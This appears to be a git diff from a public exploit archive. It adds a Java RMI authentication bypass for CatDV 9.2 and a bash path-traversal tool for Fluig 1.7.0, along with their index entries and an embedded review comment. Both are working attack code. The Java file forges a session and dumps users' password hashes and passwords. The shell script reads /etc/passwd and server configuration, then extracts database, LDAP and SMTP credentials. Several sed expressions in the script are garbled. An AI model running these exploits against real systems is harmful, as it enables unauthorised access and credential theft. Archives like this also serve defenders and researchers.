diff --git a/exploits/java/remote/49621.java b/exploits/java/remote/49621.java
new file mode 100644
index 000000000..d1d6270cb
--- /dev/null
+++ b/exploits/java/remote/49621.java
@@ -0,0 +1,96 @@
+# Exploit Title: CatDV 9.2 - RMI Authentication Bypass
+# Date: 3/1/2021
+# Exploit Author: Christopher Ellis, Nick Gonella, Workday Inc.
+# Vendor Homepage: https://catdv.com/
+# Software Link: https://www.squarebox.com/download/CatDVServer9.2.0.exe
+# Version: 9.2 and lower
+# Tested on: Windows, Mac
+
+import org.h2.engine.User;
+import squarebox.catdv.shared.*;
+
+import java.net.MalformedURLException;
+import java.rmi.Naming;
+import java.rmi.NotBoundException;
+import java.rmi.RemoteException;
+
+public class Runnable {
+ public Runnable() throws RemoteException, NotBoundException, MalformedURLException { }
+
+ private static int getValidSession(long createdTime, String claimedHost) {
+ return (int)createdTime + claimedHost.hashCode();
+ }
+
+ private static void printFields(SField[] fields) {
+ for (SField field : fields) {
+ System.out.println(field.fieldDefID);
+ System.out.println(field.value);
+ System.out.println(field.fieldDefinition);
+ }
+ }
+
+ public static void main(String args[]) throws RemoteException, NotBoundException, MalformedURLException {
+ String target = "rmi://:1099/CatDVServer";
+
+ ServerAPI look_up = (ServerAPI) Naming.lookup(target);
+
+ System.out.println("Trying to get all connections");
+ SConnection[] connections = look_up.getConnections();
+ for (SConnection element : connections) {
+ System.out.println("Found connection:");
+ System.out.println("CatDVUser:"+ element.catdvUser);
+ System.out.println("ApiVersion:"+ element.apiVersion);
+ System.out.println("User:"+ element.user);
+ System.out.println("ClaimedHost:"+ element.claimedHost);
+ System.out.println("ActualHost:"+ element.actualHost);
+ System.out.println("Created:"+ element.created);
+ System.out.println("LastUsed:"+ element.lastUsed);
+ System.out.println("Client features:"+ element.clientFeatures);
+ System.out.println("\n");
+ }
+
+ System.out.println("Getting system properties");
+ System.out.println("Running from: 
"+look_up.getProperty("user.dir")); + System.out.println("Running on: "+look_up.getProperty("os.arch")); + System.out.println("Java version: "+look_up.getProperty("java.version")); + + //We can create a new client from most of the fields found in the existing connections which we can dump anonymously + ClientID bob=new ClientID( + connections[0].catdvUser, + connections[0].claimedHost, + getValidSession(connections[0].created,connections[0].claimedHost), + connections[0].created, + ""); + + System.out.println("\nCreated a new client with parameters: \n" + + "" + "user:"+connections[0].catdvUser+"\n"+ + "" + "claimedHost:"+connections[0].claimedHost+"\n"+ + "" + "session:"+getValidSession(connections[0].created,connections[0].claimedHost)+"\n"+ + "" + "created:"+connections[0].created+"\n"+ + "" + "pubkey:"+""+ + ""); + + + String status = look_up.getStatus(bob); + System.out.println("Status is: \n "+status); + + System.out.println("Attempting to dump users: \n"); + SUser[] users=look_up.getUsers(bob, -1); + for (SUser element: users) { + + System.out.println(element.name); + System.out.println(element.passwordHash); + System.out.println("id:" + element.ID); + System.out.println("realname:" + element.realname); + System.out.println("email:" + element.email); + System.out.println("password:" + element.password); + System.out.println("notes:" + element.notes); + System.out.println("inactive:" + element.inactive); + System.out.println("RoleiD:" + element.roleID); + System.out.println("hash:" + element.passwordHash); + System.out.println(""); + } + + } + +} \ No newline at end of file diff --git a/exploits/multiple/webapps/49622.sh b/exploits/multiple/webapps/49622.sh new file mode 100755 index 000000000..3087b5a99 --- /dev/null +++ b/exploits/multiple/webapps/49622.sh 
@@ -0,0 +1,208 @@
+# Exploit Title: Fluig 1.7.0 - Path Traversal
+# Date: 26/11/2020
+# Exploit Author: Lucas Souza
+# Vendor Homepage: https://www.totvs.com/fluig/
+# Version: <== 1.7.0-210217
+# Tested on: 1.7.0-201124
+
+#!/bin/bash
+url="$1"
+npayload=$2
+> payload.txt
+curl -s https://raw.githubusercontent.com/lucxssouza/banners/main/xFluig/banner > banner
+# -- FUNCTIONS --
+
+function create-payload {
+ > wordlist.txt
+ count=1
+ while [[ $count -le $npayload ]]; do
+ # WINDOWS PAYLOAD
+ echo "?t=1&vol=Default&id=$count&ver=1000&file=../../../../../../../../../../../../../fluig/appserver/domain/configuration/domain.xml" >> wordlist.txt
+ echo "?t=1&vol=Default&id=$count&ver=1000&file=../../../../../../../../../../../../../users/public/desktop/desktop.ini" >> wordlist.txt
+ # LINUX PAYLOAD
+ echo "?t=1&vol=Default&id=$count&ver=1000&file=../../../../../../../../../../../../../etc/passwd" >> wordlist.txt
+ echo "?t=1&vol=Default&id=$count&ver=1000&file=../../../../../../../../../../../../../opt/fluig/appserver/domain/configuration/domain.xml" >> wordlist.txt
+ count=$[$count + 1]
+ done
+}
+
+function manual-mode {
+ while :; do
+ echo
+ echo -e "\033[0;31m[!] 
VALID MANUAL MODE COMMANDS\033[0m"
+ echo
+ echo -e "\033[0;32m -[ clear - Clear Screen\033[0m"
+ echo -e "\033[0;32m -[ target - Set a target\033[0m"
+ echo -e "\033[0;32m -[ director/file - Ex: /etc/passwd\033[0m"
+ echo -e "\033[0;32m -[ info - Target info and parse 'domain.xml' file ( require target )\033[0m"
+ echo
+ echo -n -e "\033[0;31mMANUAL MODE >>\033[0m "; read -r input2
+ path=$(echo $input2 | sed 's/\\/\//g' | tr '[:upper:]' '[:lower:]')
+ mkfile=$(echo $path | sed 's/\//-/g' | sed 's/-//' | tr '[:upper:]' '[:lower:]')
+ if [[ $path == 'info' ]]; then
+ clear
+ cat banner
+ domain-xml
+ elif [[ $path == 'clear' ]]; then
+ clear
+ elif [[ $path == 'target' ]]; then
+ XmlPayload=''
+ echo
+ echo -n -e "\033[0;31mINSERT TARGET >> \033[0m"; read url
+ echo -n -e "\033[0;31mWORDLIST SIZE >> \033[0m"; read -i npayload
+ enum
+ else
+ echo
+ echo "$param../../../../../../../../../../../../..$path" > wordlist.txt
+ wfuzz -z file --zP fn=wordlist.txt,encoder=base64 -c --sc 200 $url/volume/stream/Rmx1aWc=/FUZZ | grep '"' | cut -d':' -f2 | grep 200 | cut -d'"' -f2 > payload.txt
+ DirPath=$(head -1 payload.txt)
+ if [[ $DirPath == '' ]]; then
+ echo
+ echo -e ' \033[0;33m[!] COMMAND OR DIRECTORY/FILE NOT FOUND - TYPE HELP\033[0m'
+ else
+ curl -s $url/volume/stream/Rmx1aWc=/$DirPath > report/$mdr/$mkfile
+ echo
+ echo -e '\033[0;31m'$path'\033[0m'
+ echo
+ cat report/$mdr/$mkfile
+ echo
+ pwd=$(pwd)
+ echo
+ echo -e '\033[0;33m'[!] FILE SAVE IN, $pwd/report/$mdr/$mkfile'\033[0m'
+ fi
+ fi
+ done
+}
+
+function domain-xml {
+ domain=$(ls report/$mdr | grep domain.xml)
+if [[ $domain == '' ]]; then
+ echo
+ echo -e '\033[0;33m[!] DOMAIN.XML FILE NOT FOUND\033[0m'
+else
+ echo
+ echo -e ' \033[0;32m | TOTVS FLUIG - [+] XML ANALISYS\033[0m'
+ echo
+ echo -e ' \033[0;33m[!] 
INFORMATION\033[0m"
+ echo
+ curl -s -I $url | grep Server
+ echo
+ echo -e '\033[0;31mTarget\033[0m'
+ echo $url
+ echo
+ echo -e '\033[0;31mPayload plaintext\033[0m'
+ echo $XmlPayload | base64 -d
+ echo
+ echo
+ echo -e '\033[0;31mPayload base64 encoded\033[0m'
+ echo $XmlPayload
+ echo
+ echo -e ' \033[0;31m[!] DATABASE CONNECTIONS FOUNDS\033[0m'
+ echo
+ cat report/$mdr/domain.xml | sed 's/[[:blank:]]//g' | grep connection-url | sed 's//\o033[0;31mDB CONNECT >> \o033[0m/g' | sed 's/<\/connection-url>/ \o033[0;31m<< \o033[0m/g' | sed 's/${env.FLUIG_DATABASE_URL://g' | sed 's/}//g'
+ echo
+ echo -e ' \033[0;31m[!] USERS/PASSWORDS FOUNDS\033[0m'
+ echo
+ cat report/$mdr/domain.xml | sed 's/[[:blank:]]//g' | grep user-name | sed 's// \o033[0;31mUSER >> \o033[0m/g' | sed 's/<\/user-name>/ \o033[0;31m<< \o033[0m /g' | sed 's/${env.FLUIG_DATABASE_USER://g' | sed 's/}//g'
+ cat report/$mdr/domain.xml | sed 's/[[:blank:]]//g' | grep password'>' | sed 's//\o033[0;31m PASSWORD >> \o033[0m/g' | sed 's/<\/password>/ \o033[0;31m<< \o033[0m/g' | sed 's/${env.FLUIG_DATABASE_PASSWORD://g' | sed 's/}//g'
+ echo
+ echo -e ' \033[0;31m[!] LDAP INTEGRATIONS\033[0m'
+ echo
+ cat report/$mdr/domain.xml | sed 's/[[:blank:]]//g' | grep ldap:// | sed 's/> \o033[0m/g' | sed 's/"\/>/ \o033[0;31m<< \o033[0m /g'
+ cat report/$mdr/domain.xml | sed 's/[[:blank:]]//g' | grep baseCtxDN | sed 's/> \o033[0m/g' | sed 's/"\/>/ \o033[0;31m<< \o033[0m /g'
+ cat report/$mdr/domain.xml | sed 's/[[:blank:]]//g' | grep security.principal | sed 's/> \o033[0m/g' | sed 's/"\/>/ \o033[0;31m<< \o033[0m /g'
+ cat report/$mdr/domain.xml | sed 's/[[:blank:]]//g' | grep security.credentials | sed 's/> \o033[0m/g' | sed 's/"\/>/ \o033[0;31m<< \o033[0m /g'
+ echo
+ echo -e ' \033[0;31m[!] 
SMTP SETTINGS\033[0m'
+ echo
+ cat report/$mdr/domain.xml | sed 's/[[:blank:]]//g' | grep remote-destination | sed 's/> \o033[0m/g' | sed 's/\/>/ \o033[0;31m<< \o033[0m /g' | sed 's/${env.FLUIG_SMTP_HOST://g' | sed 's/${env.FLUIG_HOST_ADDRESS://g' | sed 's/${env.FLUIG_SMTP_PORT//g'| sed 's/}//g'
+ cat report/$mdr/domain.xml | sed 's/[[:blank:]]//g' | grep smtp-server | sed 's///g' | sed 's/password="/\o033[0;31mPASSWORD >> \o033[0m/g' | sed 's/"username="/\o033[0;31m USER >> \o033[0m/g' | sed 's/}//g' | sed 's/${env.FLUIG_SMTP_USERNAME://g' | sed 's/${env.FLUIG_SMTP_PASSWORD://g'
+ echo
+ manual-mode
+fi
+}
+
+function enum {
+mdr=$(echo $url | sed 's/https:\/\///' | sed 's/http:\/\///' | sed 's/\///')
+mkdir -p report/$mdr
+ if [[ $url == '' ]]; then
+ clear
+ cat banner
+ echo -e ' \033[0;31m-[ Usage Ex1: ./xfluig.sh FLUIG_ADDRESS REQUESTS_WFUZZ\033[0m'
+ echo -e ' \033[0;31m-[ Ex2: ./xfluig.sh FLUIG_ADDRESS:PORT REQUESTS_WFUZZ\033[0m'
+ echo -e ' \033[0;31m-[ ( ./xfluig.sh fluig.host.com:8080 1000 )\033[0m'
+ manual-mode
+ elif [[ $npayload == '' ]]; then
+ npayload=25
+ clear
+ cat banner
+ echo -e ' \033[0;32m | TOTVS FLUIG - [+] PATH ENUMERATION\033[0m'
+ echo
+ echo -e '\033[0;31m[>>] GENERATING PAYLOAD WORDLIST\033[0m'
+ echo
+ create-payload
+ else
+ clear
+ cat banner
+ echo -e ' \033[0;32m | TOTVS FLUIG - [+] PATH ENUMERATION\033[0m'
+ echo
+ echo -e '\033[0;31m[>>] GENERATING PAYLOAD WORDLIST\033[0m'
+ create-payload
+ fi
+echo
+echo -e '\033[0;31m[>>] RUNNING WFUZZ - WAIT\033[0m'
+echo
+wfuzz -z file --zP fn=wordlist.txt,encoder=base64 -c --sc 200 $url/volume/stream/Rmx1aWc=/FUZZ | grep '"' | cut -d':' -f3 | grep 200 | cut -d'"' -f2 > payload.txt
+payload=$(head -1 payload.txt)
+if [[ $payload == '' ]]; then
+ clear
+ cat banner
+ echo -e ' \033[0;32m | TOTVS FLUIG - PATH ENUMERATION AND XML ANALISYS \033[0m'
+ echo
+ echo -e '\033[0;33m[!] 
DIRECTORY/FILE NOT FOUND OR TARGET NOT VULNERABLE\033[0m'
+ echo
+ manual-mode
+else
+ param=$(echo $payload | base64 -d | cut -d '.' -f1)
+ clear
+ cat banner
+ echo -e ' \033[0;32m | TOTVS FLUIG - [+] STATUS\033[0m'
+ echo
+ echo -e ' \033[0;33m[!] VULNERABLE\033[0m'
+ echo
+ echo -e '\033[0;31m[>>] SEARCHING DOMAIN.XML FILE\033[0m'
+ echo "$param../../../../../../../../../../../../../fluig/appserver/domain/configuration/domain.xml" > wordlist.txt
+ echo "$param../../../../../../../../../../../../../opt/fluig/appserver/domain/configuration/domain.xml" >> wordlist.txt
+ wfuzz -z file --zP fn=wordlist.txt,encoder=base64 -c --sc 200 $url/volume/stream/Rmx1aWc=/FUZZ | grep '"' | cut -d':' -f3 | grep 200 | cut -d'"' -f2 > payload.txt
+ clear
+ cat banner
+ echo -e ' \033[0;32m | TOTVS FLUIG - [+] STATUS\033[0m'
+ echo
+ echo -e ' \033[0;33m[!] VULNERABLE\033[0m'
+ echo
+ curl -s -I $url | grep Server
+ echo
+ echo -e '\033[0;31mTarget\033[0m'
+ echo $url
+ echo
+ echo -e '\033[0;31mPayload plaintext\033[0m'
+ echo $payload | base64 -d
+ echo
+ echo
+ echo -e '\033[0;31mPayload base64 encoded\033[0m'
+ echo $payload
+ echo
+fi
+XmlPayload=$(head -1 payload.txt)
+if [[ $XmlPayload == '' ]]; then
+ echo
+ echo -e '\033[0;33m[!] DOMAIN.XML FILE NOT FOUND\033[0m'
+ manual-mode
+else
+ curl -s $url/volume/stream/Rmx1aWc=/$XmlPayload | sed 's/[[:blank:]]//g' > report/$mdr/domain.xml
+ echo
+ echo -e '\033[0;33m[!] DOMAIN.XML FILE FOUND - TYPE "INFO" TO PARSE\033[0m'
+ manual-mode
+fi
+}
+enum
\ No newline at end of file
diff --git a/files_exploits.csv b/files_exploits.csv
index 7ae944904..8024f0772 100644
--- a/files_exploits.csv
+++ b/files_exploits.csv
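Review bot: The `#!/bin/bash` line is the eighth line of `49622.sh`, after the comment header, so it is inert; the script relies on bash-only syntax (`[[ ]]`, `function`, `$[ ]`, `read -r`) yet runs under whatever shell the caller falls back to. It should be the first line, with the exploit-db header below it. The script also downloads `banner` from a raw GitHub URL on every run and `cat`s it to the terminal unchecked, an unpinned remote dependency whose content, escape sequences included, is rendered as-is; embedding the banner via a quoted heredoc (`cat <<'EOF' … EOF`) removes the network fetch. Several `sed` expressions in `domain-xml` have an empty search pattern (`sed 's//…/g'`, `sed 's/> …/g'`), which GNU sed rejects with "no previous regular expression"; this looks like the XML tag names were stripped when the page was extracted rather than in the committed file, so it is worth checking against the original.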
@@ -18392,6 +18392,7 @@ id,file,description,date,author,type,platform,port
 49599,exploits/windows/remote/49599.py,"Remote Desktop Web Access - Authentication Timing Attack (Metasploit Module)",2021-02-26,"Matthew Dunn",remote,windows,
 49601,exploits/windows/remote/49601.py,"WiFi Mouse 1.7.8.5 - Remote Code Execution",2021-03-01,H4rk3nz0,remote,windows,
 49613,exploits/linux/remote/49613.py,"AnyDesk 5.5.2 - Remote Code Execution",2021-03-03,scryh,remote,linux,
+49621,exploits/java/remote/49621.java,"CatDV 9.2 - RMI Authentication Bypass",2021-03-05,"Christopher Ellis",remote,java,
 6,exploits/php/webapps/6.php,"WordPress Core 2.0.2 - 'cache' Remote Shell Injection",2006-05-25,rgod,webapps,php,
 44,exploits/php/webapps/44.pl,"phpBB 2.0.5 - SQL Injection Password Disclosure",2003-06-20,"Rick Patel",webapps,php,
 47,exploits/php/webapps/47.c,"phpBB 2.0.4 - PHP Remote File Inclusion",2003-06-30,Spoofed,webapps,php,
@@ -43807,3 +43808,4 @@ id,file,description,date,author,type,platform,port
 49618,exploits/php/webapps/49618.txt,"Online Ordering System 1.0 - Blind SQL Injection (Unauthenticated)",2021-03-04,"Suraj Bhosale",webapps,php,
 49619,exploits/php/webapps/49619.txt,"Web Based Quiz System 1.0 - 'eid' Union Based Sql Injection (Authenticated)",2021-03-04,"Deepak Kumar Bharti",webapps,php,
 49620,exploits/php/webapps/49620.py,"Textpattern 4.8.3 - Remote code execution (Authenticated) (2)",2021-03-04,"Ricardo Ruiz",webapps,php,
+49622,exploits/multiple/webapps/49622.sh,"Fluig 1.7.0 - Path Traversal",2021-03-05,"Lucas Souza",webapps,multiple,